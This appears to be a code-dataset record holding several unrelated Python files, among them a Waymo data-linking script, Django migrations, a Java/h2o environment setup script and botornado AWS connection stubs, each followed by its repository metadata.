waymo_tra['pre'] = os.path.join(base_data, split, 'training' + cam_view, 'prev_{}'.format(cam_num))
waymo_raw_val = dict()
waymo_raw_val['cal'] = os.path.join(base_data, 'waymo', 'validation', 'calib')
waymo_raw_val['ims'] = os.path.join(base_data, 'waymo', 'validation', 'image_{}'.format(cam_num))
waymo_raw_val['lab'] = os.path.join(base_data, 'waymo', 'validation', 'label_{}'.format(cam_num))
waymo_raw_val['pre'] = os.path.join(base_data, 'waymo', 'validation', 'prev_{}'.format(cam_num))
waymo_val = dict()
waymo_val['cal'] = os.path.join(base_data, split, 'validation' + cam_view, 'calib')
waymo_val['ims'] = os.path.join(base_data, split, 'validation' + cam_view, 'image_{}'.format(cam_num))
waymo_val['lab'] = os.path.join(base_data, split, 'validation' + cam_view, 'label_{}'.format(cam_num))
waymo_val['pre'] = os.path.join(base_data, split, 'validation' + cam_view, 'prev_{}'.format(cam_num))
tra_file = os.path.join(base_data, split, 'train'+ cam_view + '.txt')
val_file = os.path.join(base_data, split, 'val' + cam_view + '.txt')
# mkdirs
mkdir_if_missing(waymo_tra['cal'])
mkdir_if_missing(waymo_tra['ims'])
mkdir_if_missing(waymo_tra['lab'])
mkdir_if_missing(waymo_tra['pre'])
mkdir_if_missing(waymo_val['cal'])
mkdir_if_missing(waymo_val['ims'])
mkdir_if_missing(waymo_val['lab'])
mkdir_if_missing(waymo_val['pre'])
print('Linking train')
text_file = open(tra_file, 'r')
imind = 0
for line in text_file:
parsed = re.search('(\d+)', line)
if parsed is not None:
id = str(parsed[0])
new_id = '{:015d}'.format(imind)
if not os.path.exists(os.path.join(waymo_tra['cal'], str(new_id) + '.txt')):
os.symlink(os.path.join(waymo_raw_tra['cal'], str(id) + '.txt'),
os.path.join(waymo_tra['cal'], str(new_id) + '.txt'))
if not os.path.exists(os.path.join(waymo_tra['ims'], str(new_id) + '.png')):
os.symlink(os.path.join(waymo_raw_tra['ims'], str(id) + '.png'),
os.path.join(waymo_tra['ims'], str(new_id) + '.png'))
if not os.path.exists(os.path.join(waymo_tra['pre'], str(new_id) + '_01.png')):
os.symlink(os.path.join(waymo_raw_tra['pre'], str(id) + '_01.png'),
os.path.join(waymo_tra['pre'], str(new_id) + '_01.png'))
if not os.path.exists(os.path.join(waymo_tra['pre'], str(new_id) + '_02.png')):
os.symlink(os.path.join(waymo_raw_tra['pre'], str(id) + '_02.png'),
os.path.join(waymo_tra['pre'], str(new_id) + '_02.png'))
if not os.path.exists(os.path.join(waymo_tra['pre'], str(new_id) + '_03.png')):
os.symlink(os.path.join(waymo_raw_tra['pre'], str(id) + '_03.png'),
os.path.join(waymo_tra['pre'], str(new_id) + '_03.png'))
if not os.path.exists(os.path.join(waymo_tra['lab'], str(new_id) + '.txt')):
os.symlink(os.path.join(waymo_raw_tra['lab'], str(id) + '.txt'),
os.path.join(waymo_tra['lab'], str(new_id) + '.txt'))
imind += 1
text_file.close()
print('Linking val')
text_file = open(val_file, 'r')
imind = 0
for line in text_file:
parsed = re.search('(\d+)', line)
if parsed is not None:
id = str(parsed[0])
new_id = '{:015d}'.format(imind)
if not os.path.exists(os.path.join(waymo_val['cal'], str(new_id) + '.txt')):
os.symlink(os.path.join(waymo_raw_val['cal'], str(id) + '.txt'),
os.path.join(waymo_val['cal'], str(new_id) + '.txt'))
if not os.path.exists(os.path.join(waymo_val['ims'], str(new_id) + '.png')):
os.symlink(os.path.join(waymo_raw_val['ims'], str(id) + '.png'),
os.path.join(waymo_val['ims'], str(new_id) + '.png'))
if not os.path.exists(os.path.join(waymo_val['pre'], str(new_id) + '_01.png')):
os.symlink(os.path.join(waymo_raw_val['pre'], str(id) + '_01.png'),
os.path.join(waymo_val['pre'], str(new_id) + '_01.png'))
if not os.path.exists(os.path.join(waymo_val['pre'], str(new_id) + '_02.png')):
os.symlink(os.path.join(waymo_raw_val['pre'], str(id) + '_02.png'),
os.path.join(waymo_val['pre'], str(new_id) + '_02.png'))
if not os.path.exists(os.path.join(waymo_val['pre'], str(new_id) + '_03.png')):
os.symlink(os.path.join(waymo_raw_val['pre'], str(id) + '_03.png'),
os.path.join(waymo_val['pre'], str(new_id) + '_03.png'))
if not os.path.exists(os.path.join(waymo_val['lab'], str(new_id) + '.txt')):
os.symlink(os.path.join(waymo_raw_val['lab'], str(id) + '.txt'),
os.path.join(waymo_val['lab'], str(new_id) + '.txt'))
imind += 1
text_file.close()
print('Done')
| 39.683871 | 102 | 0.614372 | 956 | 6,151 | 3.725941 | 0.105649 | 0.112858 | 0.154408 | 0.1516 | 0.822852 | 0.754913 | 0.714767 | 0.576081 | 0.557552 | 0.464907 | 0 | 0.009864 | 0.175906 | 6,151 | 154 | 103 | 39.941558 | 0.692839 | 0.025687 | 0 | 0.148148 | 0 | 0 | 0.128466 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.12963 | 0 | 0.12963 | 0.046296 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77717625e122c9e733631c27956ba3d68b41cad0 | 244 | py | Python | facts/cms_app.py | evildmp/facts | bcfb0ce33cf70f208d3db3abe1bc2969ef468f01 | [
"MIT"
] | 1 | 2015-07-20T10:40:25.000Z | 2015-07-20T10:40:25.000Z | facts/cms_app.py | evildmp/facts | bcfb0ce33cf70f208d3db3abe1bc2969ef468f01 | [
"MIT"
] | null | null | null | facts/cms_app.py | evildmp/facts | bcfb0ce33cf70f208d3db3abe1bc2969ef468f01 | [
"MIT"
] | null | null | null | from cms.app_base import CMSApp
from cms.apphook_pool import apphook_pool
from django.utils.translation import ugettext_lazy as _
class FactsApphook(CMSApp):
name = _("Facts")
urls = ["facts.urls"]
apphook_pool.register(FactsApphook)
| 24.4 | 55 | 0.778689 | 33 | 244 | 5.545455 | 0.606061 | 0.180328 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135246 | 244 | 9 | 56 | 27.111111 | 0.867299 | 0 | 0 | 0 | 0 | 0 | 0.061475 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.857143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
77a183af4339d21d85056b154e87b277a85c39f0 | 580 | py | Python | PrepareSession.py | Brett777/Predict-Churn | 1d6e5267a5e5165c1c9344103a86066751094404 | [
"MIT"
] | 12 | 2017-07-29T00:01:12.000Z | 2021-01-10T17:37:17.000Z | PrepareSession.py | Brett777/Predict-Churn | 1d6e5267a5e5165c1c9344103a86066751094404 | [
"MIT"
] | null | null | null | PrepareSession.py | Brett777/Predict-Churn | 1d6e5267a5e5165c1c9344103a86066751094404 | [
"MIT"
] | 8 | 2017-04-25T20:48:43.000Z | 2019-02-22T18:39:22.000Z | import os
os.system("sudo apt-get update")
#os.system('sudo apt-get install openjdk-8-jre -y')
os.system('wget --header "Cookie: oraclelicense=accept-securebackup-cookie" http://download.oracle.com/otn-pub/java/jdk/8u131-b11/d54c1d3a095b4ff2b6607d096fa80163/jdk-8u131-linux-x64.tar.gz')
os.system('tar -zxf jdk-8u131-linux-x64.tar.gz')
os.system('export JAVA_HOME=/home/jupyter/Predict-Churn/jdk1.8.0_131/')
os.system('export PATH="$JAVA_HOME/bin:$PATH"')
os.system('pip install http://h2o-release.s3.amazonaws.com/h2o/rel-ueno/5/Python/h2o-3.10.4.5-py2.py3-none-any.whl')
| 48.333333 | 191 | 0.753448 | 100 | 580 | 4.34 | 0.61 | 0.129032 | 0.0553 | 0.069124 | 0.21659 | 0.133641 | 0.133641 | 0.133641 | 0 | 0 | 0 | 0.105839 | 0.055172 | 580 | 12 | 192 | 48.333333 | 0.686131 | 0.086207 | 0 | 0 | 0 | 0.285714 | 0.80566 | 0.273585 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.142857 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77bf7fb84e41c5677ab2b9f034f6eabf08d19bd2 | 271 | py | Python | avalon/web/__init__.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | 1 | 2015-11-09T05:26:57.000Z | 2015-11-09T05:26:57.000Z | avalon/web/__init__.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | 4 | 2015-02-08T20:14:54.000Z | 2015-07-07T23:44:42.000Z | avalon/web/__init__.py | tshlabs/avalonms | 2291f8457ca86f2e963d518abbdce04af02d9054 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Avalon Music Server
#
# Copyright 2012-2015 TSH Labs <projects@tshlabs.org>
#
# Available under the MIT license. See LICENSE for details.
#
"""Avalon web endpoint handler package."""
from __future__ import absolute_import, unicode_literals
| 19.357143 | 59 | 0.730627 | 35 | 271 | 5.485714 | 0.914286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.039301 | 0.154982 | 271 | 13 | 60 | 20.846154 | 0.799127 | 0.697417 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
77c96ca5e743aed616951c057bea092269047bc4 | 785 | py | Python | isiscb/isisdata/migrations/0061_auto_20170324_1929.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 4 | 2016-01-25T20:35:33.000Z | 2020-04-07T15:39:52.000Z | isiscb/isisdata/migrations/0061_auto_20170324_1929.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 41 | 2015-08-19T17:34:41.000Z | 2022-03-11T23:19:01.000Z | isiscb/isisdata/migrations/0061_auto_20170324_1929.py | bgopalachary/IsisCB | c28e3f504eea60ebeff38318d8bb2071abb28ebb | [
"MIT"
] | 2 | 2020-11-25T20:18:18.000Z | 2021-06-24T15:15:41.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-24 19:29
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('isisdata', '0060_auto_20170324_1741'),
]
operations = [
migrations.RemoveField(
model_name='historicaltracking',
name='subject_content_type',
),
migrations.RemoveField(
model_name='historicaltracking',
name='subject_instance_id',
),
migrations.RemoveField(
model_name='tracking',
name='subject_content_type',
),
migrations.RemoveField(
model_name='tracking',
name='subject_instance_id',
),
]
| 24.53125 | 48 | 0.592357 | 72 | 785 | 6.180556 | 0.569444 | 0.188764 | 0.233708 | 0.269663 | 0.534831 | 0.534831 | 0.534831 | 0.233708 | 0 | 0 | 0 | 0.060329 | 0.303185 | 785 | 31 | 49 | 25.322581 | 0.753199 | 0.086624 | 0 | 0.666667 | 1 | 0 | 0.22549 | 0.032213 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.208333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77d9022afe96be8a342e54014d59fc1fa771756f | 506 | py | Python | events/migrations/0010_auto_20180528_2033.py | Akash1S/meethub | 3517ec7b4e03ca1fe50e7053fd46349f0b31740c | [
"MIT"
] | 428 | 2018-05-11T16:36:33.000Z | 2022-02-05T15:29:23.000Z | events/migrations/0010_auto_20180528_2033.py | dmkibuka/meethub | 296a1494ab6f2828b61f0b8e4ad80308306fc23a | [
"MIT"
] | 15 | 2018-05-14T16:33:29.000Z | 2021-06-09T17:28:14.000Z | events/migrations/0010_auto_20180528_2033.py | dmkibuka/meethub | 296a1494ab6f2828b61f0b8e4ad80308306fc23a | [
"MIT"
] | 53 | 2018-05-12T10:41:24.000Z | 2022-02-23T12:15:33.000Z | # Generated by Django 2.0.4 on 2018-05-28 20:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('events', '0009_auto_20180428_0845'),
]
operations = [
migrations.RemoveField(
model_name='comment',
name='created_by',
),
migrations.RemoveField(
model_name='comment',
name='event',
),
migrations.DeleteModel(
name='Comment',
),
]
| 20.24 | 47 | 0.547431 | 47 | 506 | 5.765957 | 0.680851 | 0.121771 | 0.191882 | 0.221402 | 0.302583 | 0.302583 | 0 | 0 | 0 | 0 | 0 | 0.092814 | 0.339921 | 506 | 24 | 48 | 21.083333 | 0.718563 | 0.088933 | 0 | 0.388889 | 1 | 0 | 0.141612 | 0.050109 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.055556 | 0 | 0.222222 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
77eeeeaecaffb5cccc2f1500b691a6a344666269 | 384 | py | Python | base/site-packages/mobileadmin/templatetags/mobile_admin_media.py | edisonlz/fastor | 342078a18363ac41d3c6b1ab29dbdd44fdb0b7b3 | [
"Apache-2.0"
] | 285 | 2019-12-23T09:50:21.000Z | 2021-12-08T09:08:49.000Z | mobileadmin/templatetags/mobile_admin_media.py | jezdez-archive/django-mobileadmin | 4d5874916ecca91610b9fbdf3c50b34c2567b83e | [
"BSD-3-Clause"
] | null | null | null | mobileadmin/templatetags/mobile_admin_media.py | jezdez-archive/django-mobileadmin | 4d5874916ecca91610b9fbdf3c50b34c2567b83e | [
"BSD-3-Clause"
] | 9 | 2019-12-23T12:59:25.000Z | 2022-03-15T05:12:11.000Z | from django.template import Library
register = Library()
def mobileadmin_media_prefix():
"""
Returns the string contained in the setting MOBILEADMIN_MEDIA_PREFIX.
"""
try:
from mobileadmin.conf import settings
except ImportError:
return ''
return settings.MEDIA_PREFIX
mobileadmin_media_prefix = register.simple_tag(mobileadmin_media_prefix)
| 25.6 | 73 | 0.742188 | 43 | 384 | 6.395349 | 0.55814 | 0.2 | 0.32 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.195313 | 384 | 14 | 74 | 27.428571 | 0.889968 | 0.179688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.666667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 3 |
7acb5c4779bdc1cd6d0e8bfab4d8463b76ef166b | 413 | py | Python | 01 - EstruturaSequencial/13ex.py | lucasbraga10/ListaDeExerciciosPython | 496a6c90e33e60fdf13e841c78a22707aa7139a8 | [
"MIT"
] | null | null | null | 01 - EstruturaSequencial/13ex.py | lucasbraga10/ListaDeExerciciosPython | 496a6c90e33e60fdf13e841c78a22707aa7139a8 | [
"MIT"
] | null | null | null | 01 - EstruturaSequencial/13ex.py | lucasbraga10/ListaDeExerciciosPython | 496a6c90e33e60fdf13e841c78a22707aa7139a8 | [
"MIT"
] | null | null | null | '''13 - Tendo como dado de entrada a altura (h) de uma pessoa, construa um algoritmo que calcule seu peso ideal,
utilizando as seguintes fórmulas:
* Para homens: (72.7*h) - 58
* Para mulheres: (62.1*h) - 44.7
'''
altura = float(input('Digite a sua altura em metros: '))
print(f'O peso ideal para homens é de {(72.7*altura) - 58:.2f}Kg')
print(f'O peso ideal para mulheres é de {(62.1*altura) - 44.7:.2f}Kg')
| 37.545455 | 112 | 0.675545 | 77 | 413 | 3.623377 | 0.571429 | 0.096774 | 0.050179 | 0.078853 | 0.143369 | 0.143369 | 0 | 0 | 0 | 0 | 0 | 0.076246 | 0.174334 | 413 | 10 | 113 | 41.3 | 0.741935 | 0.501211 | 0 | 0 | 0 | 0.333333 | 0.742424 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
7ad914f27e6f44076a38b1e259798547bd6b192b | 646 | py | Python | prototype-scripts/src/check_dependencies.py | thomaslienbacher/one-man-rps | 136dd27cfb7e3a7f2a8c016c4c758a3040dd1a02 | [
"MIT"
] | null | null | null | prototype-scripts/src/check_dependencies.py | thomaslienbacher/one-man-rps | 136dd27cfb7e3a7f2a8c016c4c758a3040dd1a02 | [
"MIT"
] | null | null | null | prototype-scripts/src/check_dependencies.py | thomaslienbacher/one-man-rps | 136dd27cfb7e3a7f2a8c016c4c758a3040dd1a02 | [
"MIT"
] | null | null | null | """
Diese Script kann genutzt werden, um zu überprüfen ob alle Python Bibliotheken installiert wurden.
Wenn am Ende ein Smiley kommt ist höchst wahrscheinlich alles korrekt installiert.
"""
print("Loading...")
import numpy
import matplotlib
import cv2
from picamera import mmal
import tensorflow
print("Versions installed:")
print(" numpy:", numpy.__version__)
print(" matplotlib:", matplotlib.__version__)
print(" cv2:", cv2.__version__)
print(" picamera (MMAL version):", "{}.{}".format(mmal.MMAL_VERSION_MAJOR, mmal.MMAL_VERSION_MINOR))
print(" tensorflow:", tensorflow.__version__)
print("\nIt seems that everything is installed :)")
| 30.761905 | 101 | 0.763158 | 79 | 646 | 5.987342 | 0.582278 | 0.10148 | 0.063425 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005263 | 0.117647 | 646 | 20 | 102 | 32.3 | 0.824561 | 0.280186 | 0 | 0 | 0 | 0 | 0.310722 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.384615 | 0 | 0.384615 | 0.615385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 3 |
7af88202badb8480b931c63249d3ac2f5894816a | 12,123 | py | Python | botornado/__init__.py | bopopescu/botornado-1 | 324a1942fbe33ef41af7ae99c25478be2bdce5dc | [
"MIT"
] | 22 | 2015-04-14T13:29:48.000Z | 2017-11-15T18:03:25.000Z | botornado/__init__.py | bopopescu/botornado-1 | 324a1942fbe33ef41af7ae99c25478be2bdce5dc | [
"MIT"
] | 2 | 2015-10-26T11:10:17.000Z | 2016-04-25T23:57:57.000Z | botornado/__init__.py | bopopescu/botornado-1 | 324a1942fbe33ef41af7ae99c25478be2bdce5dc | [
"MIT"
] | 9 | 2015-04-20T14:34:25.000Z | 2021-06-09T00:13:26.000Z | # Copyright (c) 2006-2011 Mitch Garnaat http://garnaat.org/
# Copyright (c) 2010-2011, Eucalyptus Systems, Inc.
# Copyright (c) 2011, Nexenta Systems Inc.
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.pyami.config import Config, BotoConfigLocations
from boto.storage_uri import BucketStorageUri, FileStorageUri
import boto.plugin
import os, re, sys
import logging
import logging.config
from boto.exception import InvalidUriError
from boto import *
def connect_sqs(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sqs.connection.SQSConnection`
:return: A connection to Amazon's SQS
"""
from botornado.sqs.connection import AsyncSQSConnection
return AsyncSQSConnection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_s3(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Amazon's S3
"""
from botornado.s3.connection import AsyncS3Connection
return AsyncS3Connection(aws_access_key_id, aws_secret_access_key, **kwargs)
def connect_gs(gs_access_key_id=None, gs_secret_access_key=None, **kwargs):
"""
@type gs_access_key_id: string
@param gs_access_key_id: Your Google Cloud Storage Access Key ID
@type gs_secret_access_key: string
@param gs_secret_access_key: Your Google Cloud Storage Secret Access Key
@rtype: L{GSConnection<boto.gs.connection.GSConnection>}
@return: A connection to Google's Storage service
"""
raise BotoClientError('Not Implemented')
def connect_ec2(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Amazon's EC2
"""
raise BotoClientError('Not Implemented')
def connect_elb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.elb.ELBConnection`
:return: A connection to Amazon's Load Balancing Service
"""
raise BotoClientError('Not Implemented')
def connect_autoscale(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.autoscale.AutoScaleConnection`
:return: A connection to Amazon's Auto Scaling Service
"""
raise BotoClientError('Not Implemented')
def connect_cloudwatch(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.cloudwatch.CloudWatchConnection`
:return: A connection to Amazon's EC2 Monitoring service
"""
raise BotoClientError('Not Implemented')
def connect_sdb(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sdb.connection.SDBConnection`
:return: A connection to Amazon's SDB
"""
raise BotoClientError('Not Implemented')
def connect_fps(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.fps.connection.FPSConnection`
:return: A connection to FPS
"""
raise BotoClientError('Not Implemented')
def connect_mturk(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.mturk.connection.MTurkConnection`
:return: A connection to MTurk
"""
raise BotoClientError('Not Implemented')
def connect_cloudfront(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.fps.connection.FPSConnection`
:return: A connection to FPS
"""
raise BotoClientError('Not Implemented')
def connect_vpc(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.vpc.VPCConnection`
:return: A connection to VPC
"""
raise BotoClientError('Not Implemented')
def connect_rds(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.rds.RDSConnection`
:return: A connection to RDS
"""
raise BotoClientError('Not Implemented')
def connect_emr(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.emr.EmrConnection`
:return: A connection to Elastic mapreduce
"""
raise BotoClientError('Not Implemented')
def connect_sns(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sns.SNSConnection`
:return: A connection to Amazon's SNS
"""
raise BotoClientError('Not Implemented')
def connect_iam(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.iam.IAMConnection`
:return: A connection to Amazon's IAM
"""
raise BotoClientError('Not Implemented')
def connect_route53(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.dns.Route53Connection`
:return: A connection to Amazon's Route53 DNS Service
"""
raise BotoClientError('Not Implemented')
def connect_euca(host=None, aws_access_key_id=None, aws_secret_access_key=None,
port=8773, path='/services/Eucalyptus', is_secure=False,
**kwargs):
"""
Connect to a Eucalyptus service.
:type host: string
:param host: the host name or ip address of the Eucalyptus server
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ec2.connection.EC2Connection`
:return: A connection to Eucalyptus server
"""
raise BotoClientError('Not Implemented')
def connect_walrus(host=None, aws_access_key_id=None, aws_secret_access_key=None,
port=8773, path='/services/Walrus', is_secure=False,
**kwargs):
"""
Connect to a Walrus service.
:type host: string
:param host: the host name or ip address of the Walrus server
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.s3.connection.S3Connection`
:return: A connection to Walrus
"""
raise BotoClientError('Not Implemented')
def connect_ses(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.ses.SESConnection`
:return: A connection to Amazon's SES
"""
raise BotoClientError('Not Implemented')
def connect_sts(aws_access_key_id=None, aws_secret_access_key=None, **kwargs):
"""
:type aws_access_key_id: string
:param aws_access_key_id: Your AWS Access Key ID
:type aws_secret_access_key: string
:param aws_secret_access_key: Your AWS Secret Access Key
:rtype: :class:`boto.sts.STSConnection`
:return: A connection to Amazon's STS
"""
raise BotoClientError('Not Implemented')
def connect_ia(ia_access_key_id=None, ia_secret_access_key=None,
